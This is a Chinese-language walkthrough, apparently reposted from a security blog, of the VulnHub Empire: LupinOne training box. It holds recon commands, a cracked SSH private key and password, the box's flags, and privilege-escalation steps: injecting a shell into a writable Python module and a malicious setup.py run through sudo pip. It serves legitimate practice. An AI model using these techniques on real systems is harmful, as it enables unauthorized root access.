【渗透测试】Empire-Lupin-One靶场渗透测试

admin 2025年4月6日20:11:44评论2 views字数 6761阅读22分32秒阅读模式
FOCUS ON US
点击蓝字.关注我们
【渗透测试】Empire-Lupin-One靶场渗透测试
【渗透测试】Empire-Lupin-One靶场渗透测试
01
前言
1.1
 下载安装

下载地址:https://www.vulnhub.com/entry/empire-lupinone,750/选择镜像文件进行下载。下载后解压是一个ova文件,在虚拟机中选择-打开虚拟机,选择此文件,然后修改系统网卡为NAT,在高级选项中注意网卡的MAC地址,方便后续查出本机IP。

该靶场较友好,在开机后自动显示主机IP地址。

【渗透测试】Empire-Lupin-One靶场渗透测试
1.2
 文件信息
文件名:01-Empire-Lupin-One.zip文件大小:922 MBMD5:2A8A9F31DE8030C196123023187F63BDSHA1:FDB766DD7129C78FE08DDEC850C860EFB1C3AB6F
1.3
 注意事项

02
目标
2.1
 靶场目标

获取root权限。共两个flag文件。

user.txt:3mp!r3{I_See_That_You_Manage_To_Get_My_Bunny}root.txt:3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}
03
渗透测试步骤
3.1
 信息收集

端口扫描、网站访问、目录扫描、模糊测试-字典扫描

3.1.1 端口扫描

使用nmap进行端口扫描,发现开放80和22端口。OpenSSH版本为8.4p1,Apache HTTP服务器版本为2.4.48。

nmap -sV -v -T4-A -P 192.168.241.164
【渗透测试】Empire-Lupin-One靶场渗透测试
3.1.2 网站访问

访问80端口,显示一张图片,查看源码发现有一条注释信息。

【渗透测试】Empire-Lupin-One靶场渗透测试
【渗透测试】Empire-Lupin-One靶场渗透测试

翻译后:这是一个简单的盒子,请不要放弃。

【渗透测试】Empire-Lupin-One靶场渗透测试
3.1.3 目录扫描

使用dirsearch扫描,发现开放index.html、manual/index.html、robots.txt。

dirsearch -u http://192.168.241.164
【渗透测试】Empire-Lupin-One靶场渗透测试
【渗透测试】Empire-Lupin-One靶场渗透测试
【渗透测试】Empire-Lupin-One靶场渗透测试

发现~myfiles目录。

【渗透测试】Empire-Lupin-One靶场渗透测试

访问后查看源码。发现一条注释信息,翻译后为:你能行的,继续努力

【渗透测试】Empire-Lupin-One靶场渗透测试
【渗透测试】Empire-Lupin-One靶场渗透测试
3.1.4 模糊测试-字典扫描

Wfuzz是一个Python编码的应用程序,用于模糊测试Web应用程序。它提供了各种过滤器,通过将简单的Web请求替换为变量“FUZZ”,可以将其替换为所需的字典列表。

wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.241.164/~FUZZ | grep -v 404

发现secret字段。

【渗透测试】Empire-Lupin-One靶场渗透测试

访问http://192.168.241.164/~secret/,发现以下信息。

1.存在隐藏文件;2.用fasttrack字典爆破密码;3.用户名icex64。

【渗透测试】Empire-Lupin-One靶场渗透测试
【渗透测试】Empire-Lupin-One靶场渗透测试

这段话说明该系统还存在隐藏文件,可使用fasttrack字典爆破密码,用户名为icex64。

3.2
 漏洞利用

爆破隐藏文件、爆破密码、远程连接、获得第一个flag、查看可执行文件、寻找webbrowser文件、写入shell、切换用户。

3.2.1 爆破隐藏文件

从模糊测试可知,该系统还存在隐藏文件。

使用ffuf进行扫描,获取到.mysecret.txt文件

ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.241.164/~secret/.FUZZ -e .txt,.html -mc 200
【渗透测试】Empire-Lupin-One靶场渗透测试
【渗透测试】Empire-Lupin-One靶场渗透测试

访问该网页信息,发现是一段加密。

【渗透测试】Empire-Lupin-One靶场渗透测试

使用在线工具,识别密码类型。经过检测,该段密码为base58加密。

【渗透测试】Empire-Lupin-One靶场渗透测试

对该段内容进行解密,解密后内容为SSH连接密钥。

【渗透测试】Empire-Lupin-One靶场渗透测试
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
3.2.2 爆破密码

将密钥信息保存到OpenSSH.txt

【渗透测试】Empire-Lupin-One靶场渗透测试

使用ssh2john转化为ssh私钥为john可以破解的格式。

ssh2john OpenSSH.txt > OpenSSH-Jm.txt
【渗透测试】Empire-Lupin-One靶场渗透测试

使用john破解,得到用户icex64的密码为:P@55w0rd!

john --wordlist=/usr/share/wordlists/fasttrack.txt OpenSSH-Jm.txt
【渗透测试】Empire-Lupin-One靶场渗透测试
3.2.3 远程连接

更改连接密钥文件权限,SSH连接成功。

chmod 600 OpenSSH.txtssh icex64@192.168.241.164 -i OpenSSH.txt
【渗透测试】Empire-Lupin-One靶场渗透测试
3.2.4 获得第一个flag

登录后,在该目录直接ls,即可看到user.txt文件。

【渗透测试】Empire-Lupin-One靶场渗透测试
【渗透测试】Empire-Lupin-One靶场渗透测试
3mp!r3{I_See_That_You_Manage_To_Get_My_Bunny}
3.2.5 查看可执行文件
sudo -l

查看可执行文件,发现arsene用户可免密执行Python3.9和heist文件。

【渗透测试】Empire-Lupin-One靶场渗透测试

查看arsene用户目录下文件信息,大致意思为该段代码可能会泄露账号和私密文件。

而heist.py脚本本身没有什么代码,但导入了一个模块webbrowser。

【渗透测试】Empire-Lupin-One靶场渗透测试
【渗透测试】Empire-Lupin-One靶场渗透测试
3.2.6 寻找webbrowser文件

在python3.9目录下找到webbrowser.py文件。

查看该文件的权限,发现该文件权限为可读可写可执行。

find /usr -name *webbrowser*ls -al /usr/lib/python3.9/webbrowser.py
【渗透测试】Empire-Lupin-One靶场渗透测试
3.2.7 写入shell

在该文件写入shell。

vi /usr/lib/python3.9/webbrowser.pyos.system("/bin/bash")
【渗透测试】Empire-Lupin-One靶场渗透测试
3.2.8 切换用户

使用arsene账户调用/home/arsene/heist.py,获取arsene权限。

sudo -u arsene python3.9 /home/arsene/heist.py。
【渗透测试】Empire-Lupin-One靶场渗透测试
3.3
 权限提升

查看可执行文件、创建恶意文件、获得第二个flag。

3.3.1 查看可执行文件

发现了pip命令不需要root密码即可执行。

【渗透测试】Empire-Lupin-One靶场渗透测试
3.3.2 创建恶意文件

在执行pip install时会调用setup,py,可以在本地创建恶意setup,py文件来达到任意命令执行的效果。

依次执行以下代码:

TF=$(mktemp -d)echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.pysudo pip install $TF
【渗透测试】Empire-Lupin-One靶场渗透测试
3.3.3 获得第二个flag
【渗透测试】Empire-Lupin-One靶场渗透测试
【渗透测试】Empire-Lupin-One靶场渗透测试
3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}
【渗透测试】Empire-Lupin-One靶场渗透测试
(
END
)

免责声明

本公众号“暗魂攻防实验室”致力于分享网络安全相关知识及资讯,所有内容仅供学习和交流使用,不得用于任何非法用途。由于传播、利用本公众号“暗魂攻防实验室”所提供的技术和信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任!!!

以下为本公众号声明内容,请知悉并遵守:

1.关于信息的准确性

本公众号所发布的信息均来源于公开渠道或作者整理,仅供参考,不保证内容的绝对准确性、完整性和时效性。使用者在依赖相关内容前,应独立核实信息的真实性和适用性。

2.法律与合规性

使用者应严格遵守国家相关法律法规,确保所有操作仅用于合法用途。本公众号明确禁止任何利用内容进行非法活动的行为,由此产生的后果由使用者自行承担,本公众号及作者不承担任何责任。

3.版权声明

本公众号部分内容如引用了他人作品或资源,均已标注来源或作者。如有侵权,请及时联系我们,我们将在核实后立即删除并致以歉意。

4.合法用途限制

本公众号内容仅供参考,任何利用本公众号内容从事违法行为的后果均由使用者自行承担,本公众号及作者对此不承担任何责任。

5.风险告知

因使用或传播本公众号内容导致的直接或间接后果(如系统损坏、数据丢失、法律责任等),均由使用者自行承担。本公众号及作者对此不承担任何责任。

【渗透测试】Empire-Lupin-One靶场渗透测试
FINANCE
扫码联系
暗魂攻防实验室官方客服
往期推荐:

【渗透测试】Empire: Breakout靶场渗透测试

Word文档宏病毒感染事件:应急处置与深度分析

【工具推荐】YYBaby-Spring_Scan

【渗透测试】napping-1.0.1靶场渗透测试

【渗透测试】Empire-Lupin-One靶场渗透测试

原文始发于微信公众号(暗魂攻防实验室):【渗透测试】Empire-Lupin-One靶场渗透测试

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月6日20:11:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【渗透测试】Empire-Lupin-One靶场渗透测试http://cn-sec.com/archives/3918360.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息